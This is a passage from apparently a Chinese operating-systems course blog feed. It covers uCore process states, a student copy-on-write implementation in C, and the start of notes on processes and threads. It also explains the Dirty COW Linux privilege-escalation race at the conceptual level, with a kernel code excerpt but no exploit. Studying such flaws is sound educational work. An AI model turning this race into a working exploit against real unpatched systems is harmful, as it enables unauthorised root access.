fork/exec/wait/exit函数的分析。并回答如下问题：</p><ul><li><p>请分析fork/exec/wait/exit在实现中是如何影响进程的执行状态的？</p><ul><li>fork会修改其子进程的状态为<code>PROC_RUNNABLE</code>，而当前进程状态不变。</li><li>exec不修改当前进程的状态，但会替换内存空间里所有的数据与代码。</li><li>wait会先检测是否存在子进程。如果存在进入<code>PROC_ZONBIE</code>的子进程，则回收该进程并函数返回。但若存在尚处于<code>PROC_RUNNABLE</code>的子进程，则当前进程会进入<code>PROC_SLEEPING</code>状态，并等待子进程唤醒。</li><li>exit会将当前进程状态设置为<code>PROC_ZONBIE</code>，并唤醒父进程，使其处于<code>PROC_RUNNABLE</code>的状态，之后主动让出CPU。</li></ul></li><li><p>请给出ucore中一个用户态进程的执行状态生命周期图（包括执行状态，执行状态之间的变换关系，以及产生变换的事件或函数调用）。</p>  <pre class="mermaid">    stateDiagram-v2  [*]-->UNINIT : alloc_proc  UNINIT-->RUNNABLE : proc_init/wakeup_proc  RUNNING-->SLEEPING : try_free_pages/do_wait/do_sleep  RUNNING-->ZONBIE : do_exit  RUNNABLE-->RUNNING : 调度器调度  RUNNING-->RUNNABLE : 时间片耗尽  SLEEPING-->RUNNABLE : wakeup_proc  ZONBIE-->[*] : 资源回收</pre></li></ul><h3 id="4-扩展练习">4) 扩展练习</h3><blockquote><p><strong>实现 Copy on Write （COW）机制</strong></p><p>同时，由于COW实现比较复杂，容易引入bug，请参考 <a href="https://dirtycow.ninja/">Dirty COW (CVE-2016-5195)</a> 看看能否在ucore的COW实现中模拟这个错误和解决方案。需要有解释。</p><p>这是一个big challenge.</p></blockquote><h4 id="1-思路">1. 思路</h4><p>当一个用户父进程创建自己的子进程时，父进程会把其申请的用户空间设置为只读，子进程可共享父进程占用的用户内存空间中的页面（这就是一个共享的资源）。当其中任何一个进程修改此用户内存空间中的某页面时，ucore会通过page fault异常获知该操作，并完成拷贝内存页面，使得两个进程都有各自的内存页面。这样一个进程所做的修改不会被另外一个进程可见了。（uCore实验手册原句）</p><h4 id="2-具体实现">2. 具体实现</h4><ul><li><p>当进行内存访问时，CPU会根据PTE上的读写位<code>PTE_P</code>、<code>PTE_W</code>来确定当前内存操作是否允许，如果不允许，则缺页中断。我们可以在<code>copy_range</code>函数中，将父进程中所有PTE中的<code>PTE_W</code>置为0，这样便可以将父进程中所有空间都设置为只读。然后使子进程的PTE全部指向父进程中PTE存放的物理地址，这样便可以达到内存共享的目的。</p><blockquote><p>为什么要设置父进程所有空间为只读呢，因为在之后的内存操作中，如果对这些空间进行写操作的话，程序就会触发缺页中断，那么CPU就可以在缺页中断程序中复制该内存，也就是写时复制。</p></blockquote><blockquote><p>为什么在copy_range函数中实现内存共享呢？因为我们可以在该函数中对其传入的<code>share</code>参数进行处理。</p></blockquote><p>最终实现如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">copy_range</span><span class="params">(<span class="type">pde_t</span> *to, <span class="type">pde_t</span> *from, <span class="type">uintptr_t</span> start, <span class="type">uintptr_t</span> end, <span class="type">bool</span> share)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(start % PGSIZE == <span class="number">0</span> &amp;&amp; end % PGSIZE == <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">USER_ACCESS</span>(start, end));</span><br><span class="line">    <span class="comment">// copy content by page unit.</span></span><br><span class="line">    <span class="keyword">do</span> &#123;</span><br><span class="line">        <span class="comment">//call get_pte to find process A&#x27;s pte according to the addr start</span></span><br><span class="line">        <span class="type">pte_t</span> *ptep = <span class="built_in">get_pte</span>(from, start, <span class="number">0</span>), *nptep;</span><br><span class="line">        <span class="keyword">if</span> (ptep == <span class="literal">NULL</span>) &#123;</span><br><span class="line">            start = <span class="built_in">ROUNDDOWN</span>(start + PTSIZE, PTSIZE);</span><br><span class="line">            <span class="keyword">continue</span> ;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">//call get_pte to find process B&#x27;s pte according to the addr start. If pte is NULL, just alloc a PT</span></span><br><span class="line">        <span class="keyword">if</span> (*ptep &amp; PTE_P) &#123;</span><br><span class="line">            <span class="keyword">if</span> ((nptep = <span class="built_in">get_pte</span>(to, start, <span class="number">1</span>)) == <span class="literal">NULL</span>)</span><br><span class="line">                <span class="keyword">return</span> -E_NO_MEM;</span><br><span class="line">            <span class="type">uint32_t</span> perm = (*ptep &amp; PTE_USER);</span><br><span class="line">            <span class="comment">//get page from ptep</span></span><br><span class="line">            <span class="keyword">struct</span> <span class="title class_">Page</span> *page = <span class="built_in">pte2page</span>(*ptep);</span><br><span class="line">            <span class="type">int</span> ret = <span class="number">0</span>;</span><br><span class="line">            <span class="comment">// 如果启用写时复制</span></span><br><span class="line">            <span class="keyword">if</span>(share)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="built_in">cprintf</span>(<span class="string">&quot;Sharing the page 0x%x\n&quot;</span>, <span class="built_in">page2kva</span>(page));</span><br><span class="line">                <span class="comment">// 物理页面共享，并设置两个PTE上的标志位为只读</span></span><br><span class="line">                <span class="built_in">page_insert</span>(from, page, start, perm &amp; ~PTE_W);</span><br><span class="line">                ret = <span class="built_in">page_insert</span>(to, page, start, perm &amp; ~PTE_W);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// 完整拷贝内存</span></span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">            &#123;</span><br><span class="line">                <span class="comment">// alloc a page for process B</span></span><br><span class="line">                <span class="comment">// 目标页面地址</span></span><br><span class="line">                <span class="keyword">struct</span> Page *npage = <span class="built_in">alloc_page</span>();</span><br><span class="line">                <span class="built_in">assert</span>(page!=<span class="literal">NULL</span>);</span><br><span class="line">                <span class="built_in">assert</span>(npage!=<span class="literal">NULL</span>);</span><br><span class="line">                <span class="built_in">cprintf</span>(<span class="string">&quot;alloc a new page 0x%x\n&quot;</span>, <span class="built_in">page2kva</span>(npage));</span><br><span class="line">                <span class="type">void</span> * kva_src = <span class="built_in">page2kva</span>(page);</span><br><span class="line">                <span class="type">void</span> * kva_dst = <span class="built_in">page2kva</span>(npage);</span><br><span class="line">                <span class="built_in">memcpy</span>(kva_dst, kva_src, PGSIZE);</span><br><span class="line">                <span class="comment">// 将目标页面地址设置到PTE中</span></span><br><span class="line">                ret = <span class="built_in">page_insert</span>(to, npage, start, perm);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="built_in">assert</span>(ret == <span class="number">0</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        start += PGSIZE;</span><br><span class="line">    &#125; <span class="keyword">while</span> (start != <span class="number">0</span> &amp;&amp; start &lt; end);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>当某个进程想写入一个共享内存时，由于PTE上的<code>PTE_W</code>为0，所以会触发缺页中断处理程序。此时进程需要在缺页中断处理程序中复制该页内存，并设置该页内存所对应的<code>PTE_W</code>为1。</p><blockquote><p>需要注意的是，在执行缺页中断处理程序中的内存复制操作前，需要先检查该物理页的引用次数。如果该引用次数已经为1了，则表明此时的物理页只有当前进程所使用，故可以直接设置该页内存所对应的<code>PTE_W</code>为1即可，不需要进行内存复制。</p></blockquote><p>最终实现如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">do_pgfault</span><span class="params">(<span class="keyword">struct</span> mm_struct *mm, <span class="type">uint32_t</span> error_code, <span class="type">uintptr_t</span> addr)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// ........</span></span><br><span class="line">   <span class="comment">// 查找当前虚拟地址所对应的页表项</span></span><br><span class="line">    <span class="keyword">if</span> ((ptep = <span class="built_in">get_pte</span>(mm-&gt;pgdir, addr, <span class="number">1</span>)) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;get_pte in do_pgfault failed\n&quot;</span>);</span><br><span class="line">        <span class="keyword">goto</span> failed;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 如果这个页表项所对应的物理页不存在，则</span></span><br><span class="line">    <span class="keyword">if</span> (*ptep == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// 分配一块物理页，并设置页表项</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">pgdir_alloc_page</span>(mm-&gt;pgdir, addr, perm) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">            <span class="built_in">cprintf</span>(<span class="string">&quot;pgdir_alloc_page in do_pgfault failed\n&quot;</span>);</span><br><span class="line">            <span class="keyword">goto</span> failed;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">struct</span> Page *page=<span class="literal">NULL</span>;</span><br><span class="line">        <span class="comment">// 如果当前页错误的原因是写入了只读页面</span></span><br><span class="line">        <span class="keyword">if</span> (*ptep &amp; PTE_P) &#123;</span><br><span class="line">            <span class="comment">// 写时复制：复制一块内存给当前进程</span></span><br><span class="line">            <span class="built_in">cprintf</span>(<span class="string">&quot;\n\nCOW: ptep 0x%x, pte 0x%x\n&quot;</span>,ptep, *ptep);</span><br><span class="line">            <span class="comment">// 原先所使用的只读物理页</span></span><br><span class="line">            page = <span class="built_in">pte2page</span>(*ptep);</span><br><span class="line">            <span class="comment">// 如果该物理页面被多个进程引用</span></span><br><span class="line">            <span class="keyword">if</span>(<span class="built_in">page_ref</span>(page) &gt; <span class="number">1</span>)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="comment">// 释放当前PTE的引用并分配一个新物理页</span></span><br><span class="line">                <span class="keyword">struct</span> <span class="title class_">Page</span>* newPage = <span class="built_in">pgdir_alloc_page</span>(mm-&gt;pgdir, addr, perm);</span><br><span class="line">                <span class="type">void</span> * kva_src = <span class="built_in">page2kva</span>(page);</span><br><span class="line">                <span class="type">void</span> * kva_dst = <span class="built_in">page2kva</span>(newPage);</span><br><span class="line">                <span class="comment">// 拷贝数据</span></span><br><span class="line">                <span class="built_in">memcpy</span>(kva_dst, kva_src, PGSIZE);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// 如果该物理页面只被当前进程所引用,即page_ref等1</span></span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">                <span class="comment">// 则可以直接执行page_insert，保留当前物理页并重设其PTE权限。</span></span><br><span class="line">                <span class="built_in">page_insert</span>(mm-&gt;pgdir, page, addr, perm);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// 如果swap已经初始化完成</span></span><br><span class="line">            <span class="keyword">if</span>(swap_init_ok) &#123;</span><br><span class="line">                <span class="comment">// 将目标数据加载到某块新的物理页中。</span></span><br><span class="line">                <span class="comment">// 该物理页可能是尚未分配的物理页，也可能是从别的已分配物理页中取的</span></span><br><span class="line">                <span class="keyword">if</span> ((ret = <span class="built_in">swap_in</span>(mm, addr, &amp;page)) != <span class="number">0</span>) &#123;</span><br><span class="line">                    <span class="built_in">cprintf</span>(<span class="string">&quot;swap_in in do_pgfault failed\n&quot;</span>);</span><br><span class="line">                    <span class="keyword">goto</span> failed;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="comment">// 将该物理页与对应的虚拟地址关联，同时设置页表。</span></span><br><span class="line">                <span class="built_in">page_insert</span>(mm-&gt;pgdir, page, addr, perm);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="built_in">cprintf</span>(<span class="string">&quot;no swap_init_ok but ptep is %x, failed\n&quot;</span>,*ptep);</span><br><span class="line">                <span class="keyword">goto</span> failed;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 当前缺失的页已经加载回内存中，所以设置当前页为可swap。</span></span><br><span class="line">        <span class="built_in">swap_map_swappable</span>(mm, addr, page, <span class="number">1</span>);</span><br><span class="line">        page-&gt;pra_vaddr = addr;</span><br><span class="line">   &#125;</span><br><span class="line">   ret = <span class="number">0</span>;</span><br><span class="line">failed:</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>这个COW的实现效果相当不错，很好的通过了<code>make grade</code>测试。</p></li></ul><h4 id="3-脏牛本地提权漏洞分析">3. 脏牛本地提权漏洞分析</h4><blockquote><p>该漏洞笔者只会简单概括一下，会忽略大部分细节。更多细节请移步<a href="https://github.com/qy7tt/blog/blob/master/20161124-%E8%A7%A3%E8%AF%BBCVE-2016-5195-Dirty-COW-Linux%E6%9C%AC%E5%9C%B0%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E.md">解读CVE-2016-5195(Dirty COW)Linux本地提权漏洞</a></p></blockquote><ul><li><p>先给出漏洞函数的代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">long</span> __get_user_pages(<span class="keyword">struct</span> task_struct *tsk, <span class="keyword">struct</span> mm_struct *mm,</span><br><span class="line">        <span class="type">unsigned</span> <span class="type">long</span> start, <span class="type">unsigned</span> <span class="type">long</span> nr_pages,</span><br><span class="line">        <span class="type">unsigned</span> <span class="type">int</span> gup_flags, <span class="keyword">struct</span> page **pages,</span><br><span class="line">        <span class="keyword">struct</span> vm_area_struct **vmas, <span class="type">int</span> *nonblocking)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// ....</span></span><br><span class="line">  <span class="keyword">do</span> &#123;</span><br><span class="line">retry:</span><br><span class="line">        <span class="comment">// 注意这里的进程调度</span></span><br><span class="line">        <span class="built_in">cond_resched</span>();</span><br><span class="line">        <span class="comment">// ......</span></span><br><span class="line">        <span class="comment">/* 查找虚拟地址的page */</span></span><br><span class="line">        page = <span class="built_in">follow_page_mask</span>(vma, start, foll_flags, &amp;page_mask);</span><br><span class="line">        <span class="keyword">if</span> (!page) &#123;</span><br><span class="line">            <span class="comment">/* 如果page找不到，则进行处理 */</span></span><br><span class="line">            ret = <span class="built_in">faultin_page</span>(tsk, vma, start, &amp;foll_flags, nonblocking);</span><br><span class="line">            <span class="keyword">switch</span> (ret) &#123;</span><br><span class="line">            <span class="keyword">case</span> <span class="number">0</span>:</span><br><span class="line">                <span class="keyword">goto</span> retry;</span><br><span class="line">            <span class="comment">// ......</span></span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (page)</span><br><span class="line">          <span class="comment">// 加入page数组</span></span><br><span class="line">    &#125; <span class="keyword">while</span> (nr_pages);</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>执行<code>__get_user_pages</code>函数时，函数参数会携带一个<code>FOLL_WRITE</code>标记，用以指明当前操作是写入某个物理页。</p></li><li><p>在<code>follow_page_mask</code>中，程序会找出特定的物理页。但大部分情况下第一次执行该函数时无法真正将该物理页的地址返回，因为可能存在缺页或者权限不够的情况（例如写入了一个只读页）。</p></li><li><p>此时，变量<code>page</code>的值为<code>NULL</code>，之后会执行<code>faultin_page</code>函数对<code>follow_page_mask</code>的失败进行处理。包括但不限于分配新的页、修改页权限、页数据复制等等情况（上述说明的三种情况不一定会同时发生）。然后跳转至<code>retry</code>重新执行<code>follow_page_mask</code>。</p></li><li><p>经过几轮的循环后，当<code>faultin_page</code>函数再一次执行时，该函数会执行内存复制操作，以完成写时复制操作。同时  <strong><code>FOLL_WRITE</code>标记将会被抹去</strong>  ，之后<strong>跳转回<code>retry</code></strong>。</p><blockquote><p>因为COW已经执行完成，对于新的物理页无论是读还是写都没有问题，所以在下一次执行<code>follow_page_mask</code>函数时一定会返回该物理页，所以该标记已经失去了作用，可以被抹去。</p></blockquote></li><li><p>但此时需要注意的是，<code>retry</code>下的第一条语句是<code>cond_resched</code>函数，它将会执行<strong>线程调度</strong>，执行其他线程。但倘若<strong>调度到的线程将之前新创建的物理页删除</strong>，则一旦重新调度回当前线程后，执行<code>follow_page_mask</code>返回的是<strong>之前的只读页</strong>。</p><blockquote><p>为什么第一次执行<code>follow_page_mask</code>时返回NULL，而这一次执行返回的是只读页呢？</p><p>因为第一次执行时有<code>FOLL_WRITE</code>标记，权限不够，所以会返回NULL。而这次的执行由于不存在<code>FOLL_WRITE</code>标记，所以该操作会被认定为读取而不是写入，因此直接返回之前的<strong>只读物理页</strong>的地址。</p></blockquote></li><li><p>之后该<strong>只读</strong>页被添加到page数组，并在接下来的操作中被<strong>成功修改</strong>。这就是脏牛漏洞的大致原理。</p></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;这里是笔者在完成&lt;code&gt;uCore&lt;/code&gt; Lab 5时写下的一些笔记&lt;/li&gt;
&lt;li&gt;内容涉及&lt;code&gt;fork/exec/wait/exit&lt;/code&gt;机制的具体实现。&lt;/li&gt;&lt;/ul&gt;</summary>
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="uCore" scheme="https://kiprey.github.io/tags/uCore/"/>
    
    <category term="OS" scheme="https://kiprey.github.io/tags/OS/"/>
    
  </entry>
  
  <entry>
    <title>uCore实验 - Lab4</title>
    <link href="https://kiprey.github.io/2020/08/uCore-4/"/>
    <id>https://kiprey.github.io/2020/08/uCore-4/</id>
    <published>2020-08-17T09:35:38.000Z</published>
    <updated>2025-11-24T03:59:40.150Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><ul><li>这里是笔者在完成<code>uCore</code> Lab 4时写下的一些笔记</li><li>内容涉及进程/线程管理等</li><li>内容较多，建议使用右侧导航栏。</li></ul><span id="more"></span><h2 id="知识点">知识点</h2><h3 id="1-进程">1. 进程</h3><h4 id="1-概念">1) 概念</h4><ul><li><p>进程是指一个具有一定<strong>独立功能</strong>的程序在一个<strong>数据集合</strong>上的一次<strong>动态执行</strong>过程，其中包括正在运行的一个程序的<strong>所有状态信息</strong>。</p></li><li><p>进程是程序的执行，有核心态/用户态，是一个状态变化的过程</p></li><li><p>进程的组成包括程序、数据块和<strong>进程控制块PCB</strong>。</p></li></ul><h4 id="2-进程控制块">2) 进程控制块</h4><blockquote><p>进程控制块，Process Control Block, PCB。</p></blockquote><ul><li>进程控制块是<strong>操作系统管理控制进程运行所用的信息集合</strong>。操作系统用PCB来描述<strong>进程的基本情况以及运行变化的过程</strong>。</li><li><strong>PCB是进程存在的唯一标志</strong> ，每个进程都在操作系统中有一个对应的PCB。</li><li>进程控制块可以通过某个数据结构组织起来（例如链表）。同一状态进程的PCB连接成一个链表，多个状态对应多个不同的链表。各状态的进程形成不同的链表：就绪联链表，阻塞链表等等。</li></ul><h4 id="3-进程状态">3) 进程状态</h4><p>进程的生命周期通常有6种情况：<strong>进程创建、进程执行、进程等待、进程抢占、进程唤醒、进程结束</strong>。</p><blockquote><p>部分周期没有在图中标注。</p></blockquote><p><img src="/2020/08/uCore-4/processStatus.png" alt="img"></p><ul><li><p>引起进程创建的情况：</p><ul><li>系统初始化，创建idle进程。</li><li>用户或正在运行的进程请求创建新进程。</li></ul></li><li><p>进程等待（阻塞）的情况：</p><ul><li>进程请求并等待某个系统服务，无法马上完成。</li><li>启动某种操作，无法马上完成。</li><li>需要的数据没有到达。</li></ul><blockquote><p>只有该进程本身才能让自己进入休眠，但只有外部（例如操作系统）才能将该休眠的进程唤醒。</p></blockquote></li><li><p>引起进程被抢占的情况</p><ul><li>高优先级进程就绪</li><li>进程执行当前时间用完（时间片耗尽）</li></ul></li><li><p>唤醒进程的情况：</p><ul><li>被阻塞进程需要的资源可被满足。</li><li>被阻塞进程等待的事件到达。</li></ul><blockquote><p>进程只能被别的进程或操作系统唤醒。</p></blockquote></li><li><p>进程结束的情况</p><ul><li>正常或异常退出（自愿）</li><li>致命错误（强制性，例如SIGSEV）</li><li>被其他进程所<code>kill</code>（强制）</li></ul></li></ul><h4 id="4-进程挂起">4) 进程挂起</h4><blockquote><p>将处于挂起状态的进程映像在磁盘上，目的是减少进程占用的内存。</p></blockquote><p>其模型图如下</p><p><img src="/2020/08/uCore-4/suspendProcessStatus.png" alt="img"><br>以下是状态切换的简单介绍</p><ul><li>等待挂起（Blocked-suspend）： 进程在外存并等待某事件的出现。</li><li>就绪挂起（Ready-suspend）：进程在外存，但只要进入内存，即可运行。</li><li>挂起（Suspend）：把一个进程从内存转到外存。<ul><li>等待到等待挂起：没有进程处于就绪状态或就绪进程要求更多内存资源。</li><li>就绪到就绪挂起：当有高优先级进程处于等待状态（系统认为很快会就绪的），低优先级就绪进程会挂起，为高优先级进程提供更大的内存空间。</li><li>运行到就绪挂起：当有高优先级等待进程因事件出现而进入就绪挂起。</li><li>等待挂起到就绪挂起：当有等待挂起进程因相关事件出现而转换状态。</li></ul></li><li>激活（Activate）：把一个进程从外存转到内存<ul><li>就绪挂起到就绪：没有就绪进程或挂起就绪进程优先级高于就绪进程。</li><li>等待挂起到等待：当一个进程释放足够内存，并有高优先级等待挂起进程。</li></ul></li></ul><h3 id="2-线程">2. 线程</h3><h4 id="1-概念-2">1) 概念</h4><p>线程是进程的一部分，描述指令流执行状态，是进程中的指令执行流最小单位，是CPU调度的基本单位。</p><blockquote><p>进程的资源分配角色：进程由一组相关资源构成，包括地址空间、打开的文件等各种资源。</p><p>线程的处理机调度角色：线程描述在进程资源环境中指令流执行状态。</p></blockquote><h4 id="2-优缺点">2) 优缺点</h4><ul><li>优点：<ul><li>一个进程中可以存在多个线程</li><li>各个线程可以并发执行</li><li>各个线程之间可以共享地址空间和文件等资源。</li></ul></li><li>缺点：<ul><li>一个线程崩溃，会导致其所属的进程的所有线程崩溃。</li></ul></li></ul><h4 id="3-用户线程与内核线程">3) 用户线程与内核线程</h4><p>线程有三种实现方式</p><ul><li>用户线程：在用户空间实现。(POSIX Pthread)</li><li>内核线程：在内核中实现。(Windows, Linux)</li><li>轻权<strong>进程</strong>：在内核中实现，支持用户线程。</li></ul><h5 id="a-用户线程">a. 用户线程</h5><blockquote><p>用户线程是由一组用户级的线程库函数来完成线程的管理，包括线程的创建、终止、同步和调度等。</p></blockquote><ul><li>用户线程的特征<ul><li>不依赖于操作系统内核，在用户空间实现线程机制。<ul><li>可用于不支持线程的多进程操作系统。</li><li>线程控制模块（TCB）由线程库函数内部维护。</li></ul></li><li>同一个进程内的用户线程切换速度块，无需用户态/核心态切换。</li><li>允许每个进程拥有自己的线程调度算法。</li></ul></li><li>用户进程的缺点<ul><li>线程发起系统调用而阻塞时，整个进程都会进入等待状态。</li><li>不支持基于线程的处理机抢占。</li><li>只能按进程分配CPU时间。</li></ul></li></ul><h5 id="b-内核线程">b. 内核线程</h5><blockquote><p>内核线程是由内核通过系统调用实现的线程机制，由内核完成线程的创建、终止和管理。</p></blockquote><p>内核线程的特征</p><ul><li>由内核自己维护PCB和TCB</li><li>线程执行系统调用而被阻塞不影响其他线程。</li><li>线程的创建、终止和切换消耗相对较大。</li><li>以线程为单位进行CPU时间分配。其中多线程进程可以获得更多的CPU时间。</li></ul><h5 id="c-轻权进程">c. 轻权进程</h5><blockquote><p>用户线程可以自定义调度算法，但存在部分缺点。而内核线程不存在用户线程的各种缺点。</p><p>所以轻权进程是用户线程与内核线程的结合产物。</p></blockquote><ul><li><p>内核支持的用户线程。一个进程可包含一个或多个轻权进程，每个轻权进程由一个单独的内核线程来支持。</p></li><li><p>过于复杂以至于优点没有体现出来，最后演化为单一的内核线程支持。以下是其模型图：</p><p><img src="/2020/08/uCore-4/LightWeightProcess.png" alt="img"></p></li></ul><h3 id="3-线程与进程的比较">3. 线程与进程的比较</h3><ul><li>进程是资源分配单元，而线程是CPU调度单位。</li><li>进程拥有一个完整的资源平台，而线程只独享指令流执行的必要资源，例如寄存器与栈。</li><li>线程具有就绪、等待和运行三种基本状态和状态间的转换关系。</li><li>线程能减小并发执行的事件和空闲开销。<ul><li>线程的创建时间和终止时间比进程短。</li><li>同一进程内的线程切换时间比进程短。</li><li>由于同一进程的各线程间共享内存和文件资源，可不通过内核进行直接通信。</li></ul></li></ul><h3 id="4-进程控制">4. 进程控制</h3><h4 id="1-进程切换">1) 进程切换</h4><h5 id="a-过程">a. 过程</h5><ul><li>暂停当前进程，保存上下文，并从运行状态变成其他状态。</li><li>最后调度另一个进程，恢复其上下文并从就绪状态转为运行状态。</li></ul><blockquote><p>进程切换的要求：<strong>速度要快</strong>。</p></blockquote><h5 id="b-进程控制块PCB">b. 进程控制块PCB</h5><blockquote><p>进程切换涉及到<strong>进程控制块PCB结构</strong>.</p></blockquote><ul><li><p>内核为每个进程维护了对应的进程控制块（PCB）</p></li><li><p>内核将相同状态的进程的PCB放置在同一队列里。</p></li><li><p>其中，uCore中PCB结构如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">enum</span> <span class="title class_">proc_state</span> &#123;</span><br><span class="line">    PROC_UNINIT = <span class="number">0</span>,  <span class="comment">// 未初始化的     -- alloc_proc</span></span><br><span class="line">    PROC_SLEEPING,    <span class="comment">// 等待状态       -- try_free_pages, do_wait, do_sleep</span></span><br><span class="line">    PROC_RUNNABLE,    <span class="comment">// 就绪/运行状态   -- proc_init, wakeup_proc,</span></span><br><span class="line">    PROC_ZOMBIE,      <span class="comment">// 僵死状态       -- do_exit</span></span><br><span class="line">&#125;;</span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">context</span> &#123;  <span class="comment">// 保存的上下文寄存器，注意没有eax寄存器和段寄存器</span></span><br><span class="line">  